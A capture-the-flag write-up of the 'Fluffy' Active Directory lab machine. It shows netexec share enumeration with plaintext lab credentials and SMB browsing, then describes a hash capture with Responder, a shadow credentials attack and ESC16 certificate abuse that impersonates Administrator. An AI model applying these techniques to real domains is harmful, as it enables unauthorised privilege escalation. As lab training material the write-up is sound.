Fluffy
Quickie
User
We are provided access to the user j.fleischman:J0elTHEM4n1990!.
Using netexec, we can quickly scan for share access to see where the user can read/write to.
netexec smb 10.10.11.69 -u j.fleischman -p J0elTHEM4n1990! --shares
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share We can easily see that IT share looks suspicious - let's use impacket-smbclient to check it out.
impacket-smbclient j.fleischman@10.10.11.69
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# ls
[-] No share selected
# use it
# ls
drw-rw-rw- 0 Wed Jun 4 05:55:26 2025 .
drw-rw-rw- 0 Wed Jun 4 05:55:26 2025 ..
drw-rw-rw- 0 Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw- 1827464 Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw- 0 Fri May 16 22:51:49 2025 KeePass-2.58
-rw-rw-rw- 3225346 Fri May 16 22:51:49 2025 KeePass-2.58.zip
-rw-rw-rw- 169963 Sat May 17 22:31:07 2025 Upgrade_Notice.pdfUpgrade_notice.pdf suggest to use a particular cve - cloning it and using Responder gives us a callback!.
Cracking it gives us access to the user p.agila:prometheusx-303.
As always, use bloodhound to map out possible AD attack vectors.

GenericAll lets us basically do anything to the group Service Accounts - we can add the newly obtained p.agila to it with net rpc
GenericWrite lets us do either a targeted kerberoasting attack or shadow credentials attack (requires ADCS). Let's opt for shadow credentials as there is the presence of ca_svc here which suggest the use of ADCS.
Root
winrm_svc has GenericWrite writes to the users ldap_svc and ca_svcwhich means we can perform the shadow credentials attack again to retrieve their respective NThash.
ca_svc is part of the Cert Publisher Group which when queried with certipy, is vulnerable to ESC16
Looking at the documentation, we will go with scenario A as we fufill the criteria from the previous owned users.

First, we need to set the upn of our victim account ca_svc to administrator@fluffy.htb
Next, we need to request for the certificate with the associated spn using the victim account ca_svc, specifying a template such as User
Lastly, we need to revert the upn before authenticating as Administrator
Last updated